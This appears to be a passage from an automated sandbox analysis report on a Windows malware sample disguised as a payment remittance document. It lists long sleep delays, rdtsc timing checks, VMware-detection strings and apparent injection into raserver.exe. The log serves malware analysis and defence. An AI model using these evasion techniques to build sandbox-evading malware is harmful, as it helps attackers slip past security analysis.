          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233672s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233546s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233437s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233297s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233187s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233078s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -232953s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -232844s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -232703s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -232594s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -232484s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -232375s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 908Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 1124Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6088Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239859
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239749
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239640
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239311
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239202
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238656
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238309
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238156
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238046
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237812
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237687
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237578
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237469
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237344
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235563
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235407
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235296
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234765
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234655
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234328
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234219
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233922
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233796
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233546
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233187
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233078
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232844
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232703
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232594
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232484
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232375
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeWindow / User API: threadDelayed 6984
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeWindow / User API: threadDelayed 974
          Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 8.5 %
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239859
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239749
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239640
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239311
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239202
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 239063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238656
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238531
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238309
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238156
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 238046
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237812
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237687
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237578
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237469
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237344
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 237047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 236063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235563
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235407
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235296
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 235047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234765
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234655
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234328
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234219
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 234047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233922
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233796
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 43239
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233546
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233187
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 233078
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232844
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232703
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232594
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232484
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 232375
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000006.00000000.235824977.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.230183542.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAv
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000006.00000000.291724518.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000006.00000000.236758134.0000000008907000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}##
          Source: explorer.exe, 00000006.00000000.230090929.0000000004DE0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.253375018.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000006.00000000.248820491.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482740D mov eax, dword ptr fs:[00000030h]
